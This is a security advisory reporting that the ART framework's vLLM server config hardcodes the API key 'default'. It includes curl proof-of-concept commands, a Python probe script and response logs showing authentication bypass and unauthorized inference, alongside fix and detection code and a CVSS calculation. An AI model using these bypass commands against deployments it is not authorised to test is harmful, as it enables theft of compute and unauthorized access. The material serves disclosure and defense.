Description
Advisory Details
Title: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass
Description:
Summary
A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to "default". This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.
Details
In src/art/dev/openai_server.py, the get_openai_server_config function is responsible for orchestrating the setup of the internal vLLM server. The ServerArgs data structure is instantiated with a hardcoded api_key="default".
This key is assigned statically and passed to the vLLM engine at startup. The framework neither generates a secure random token nor requires the user to supply a key, so the vLLM server's authentication middleware accepts Authorization: Bearer default on every incoming REST API request.
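One way to close this gap is to resolve the key at startup from a user-supplied value and fall back to a random token. The following is a minimal sketch under stated assumptions, not ART's actual code: the function name `resolve_api_key` and the environment variable `ART_SERVER_API_KEY` are hypothetical and chosen only for illustration.

```python
import os
import secrets

# Hypothetical environment variable name, used only for this illustration.
API_KEY_ENV_VAR = "ART_SERVER_API_KEY"

# Well-known values that should never be accepted as a credential.
WEAK_KEYS = {"default"}


def resolve_api_key(env=None) -> str:
    """Return the user-supplied key if set, otherwise a fresh random token."""
    env = os.environ if env is None else env
    supplied = env.get(API_KEY_ENV_VAR, "").strip()
    if supplied:
        if supplied in WEAK_KEYS:
            raise ValueError(f"{API_KEY_ENV_VAR} must not be a well-known value")
        return supplied
    # 32 random bytes, URL-safe base64 encoded without padding (43 characters).
    return secrets.token_urlsafe(32)
```

The resolved value would then take the place of the hardcoded literal when the server arguments are built. A generated token has to be surfaced to the operator (for example, logged once at startup), otherwise legitimate clients cannot authenticate either.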
PoC
- Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g., 8000).
- Step 1: Confirm auth bypass (list models with hardcoded key):
curl -s http://<target>:8000/v1/models \
-H "Authorization: Bearer default" | python3 -m json.tool
- Step 2: Demonstrate actual harm (unauthorized inference / GPU resource theft):
curl -s http://<target>:8000/v1/chat/completions \
-H "Authorization: Bearer default" \
-H "Content-Type: application/json" \
-d '{
"model": "Qwen/Qwen1.5-0.5B",
"messages": [{"role": "user", "content": "What is the capital of France?"}],
"max_tokens": 64
}' | python3 -m json.tool
- Step 3: Negative test (wrong key is correctly rejected, proving auth middleware is active):
curl -i http://<target>:8000/v1/models \
-H "Authorization: Bearer wrong-key"
Log of Evidence
Step 1 — Auth bypass succeeds (model listing):
{
  "object": "list",
  "data": [
    {
      "id": "Qwen/Qwen1.5-0.5B",
      "object": "model",
      "created": 1774020077,
      "owned_by": "organization",
      "permission": []
    }
  ]
}
Step 2 — Unauthorized inference succeeds (GPU resource theft):
{
  "id": "chatcmpl-583d9a951ae8",
  "object": "chat.completion",
  "created": 1774020077,
  "model": "Qwen/Qwen1.5-0.5B",
  "choices": [
    {
      "index": 0,
      "message": {
        "role": "assistant",
        "content": "The capital of France is Paris..."
      },
      "finish_reason": "stop"
    }
  ],
  "usage": {
    "prompt_tokens": 30,
    "completion_tokens": 36,
    "total_tokens": 66
  }
}
The model processed the attacker's prompt and returned a valid inference result, proving the attacker can consume GPU compute resources at will without any legitimate credentials.
Step 3 — Wrong key is rejected (auth middleware is active):
HTTP/1.1 401 Unauthorized
content-type: application/json
{"error":{"message":"Unauthorized","type":"invalid_api_key"}}
This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value ("default"), not that authentication is missing.
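The positive and negative checks from the PoC (Steps 1 and 3) can also be scripted. The sketch below uses only the Python standard library and the `/v1/models` endpoint shown in the curl commands; the function names are hypothetical, and the status codes it interprets (200 and 401) are the ones recorded in the evidence above.

```python
import urllib.error
import urllib.request


def build_models_request(base_url: str, api_key: str) -> urllib.request.Request:
    """Build a GET /v1/models request carrying the given bearer token."""
    return urllib.request.Request(
        base_url.rstrip("/") + "/v1/models",
        headers={"Authorization": f"Bearer {api_key}"},
    )


def status_for_key(base_url: str, api_key: str, timeout: float = 5.0) -> int:
    """Return the HTTP status code the server gives for this key."""
    request = build_models_request(base_url, api_key)
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as err:
        return err.code  # e.g. 401 when the key is rejected


def classify(default_status: int, wrong_status: int) -> str:
    """Interpret the pair of status codes from the two probes."""
    if default_status == 200 and wrong_status == 401:
        return "vulnerable: default key accepted, auth middleware active"
    if default_status == 200 and wrong_status == 200:
        return "no authentication enforced"
    if default_status == 401:
        return "default key rejected"
    return "inconclusive"


# Usage against a deployment you are authorized to test:
#   base = "http://<target>:8000"
#   print(classify(status_for_key(base, "default"),
#                  status_for_key(base, "wrong-key")))
```

Probing with both keys matters: a 200 for the default key alone does not distinguish a hardcoded credential from a server that has authentication switched off.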
Impact
This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker who can route traffic to the listening port can bypass the API authentication layer and make arbitrary LLM inference requests. This can lead to resource exhaustion, depletion of paid compute quota, Denial of Service (DoS) through saturation of GPU capacity, and unauthorized reconnaissance of hosted models.
Affected products
- Ecosystem: python
- Package name: art
- Affected versions: <= latest
- Patched versions:
Severity
- Severity: High
- Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
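The High rating can be checked against the vector string. The sketch below applies the CVSS v3.1 base score equations for the scope-unchanged case only, using the metric weights from the specification; the function names are illustrative.

```python
import math

# CVSS v3.1 metric weights (PR values are those for scope unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x, via integer math."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (math.floor(i / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Base score for a CVSS:3.1 vector with S:U (other scopes not handled)."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles S:U")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"))  # 8.6
```

For this vector the impact sub-score is about 4.70 and the exploitability sub-score about 3.89, giving 8.6 after rounding up, which falls in the High band (7.0 to 8.9).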
Weaknesses
- CWE: CWE-798: Use of Hard-coded Credentials
Occurrences
| Permalink | Description |
|---|---|
| https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30 | The ServerArgs initialization forcefully sets api_key="default", causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions. |
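An occurrence like the one listed above can be caught mechanically. The following sketch uses Python's `ast` module to flag any call that passes a string literal as an `api_key` keyword argument. It assumes the credential is supplied as a keyword in a call expression, as the advisory describes; the function name is hypothetical and the sample source strings are made up for the demonstration, not copied from the repository.

```python
import ast


def find_hardcoded_api_keys(source: str) -> list[tuple[int, str]]:
    """Return (line number, literal) for every api_key="..." keyword in a call."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            value = keyword.value
            if (
                keyword.arg == "api_key"
                and isinstance(value, ast.Constant)
                and isinstance(value.value, str)
            ):
                hits.append((value.lineno, value.value))
    return sorted(hits)


# Illustrative inputs only: one literal key, one key read from the environment.
vulnerable = 'args = ServerArgs(api_key="default", port=8000)\n'
safer = 'import os\nargs = ServerArgs(api_key=os.environ["KEY"], port=8000)\n'

print(find_hardcoded_api_keys(vulnerable))  # [(1, 'default')]
print(find_hardcoded_api_keys(safer))       # []
```

A check of this kind could run in CI as a regression guard, though it only detects literals at the call site and would miss a key assigned to a variable first.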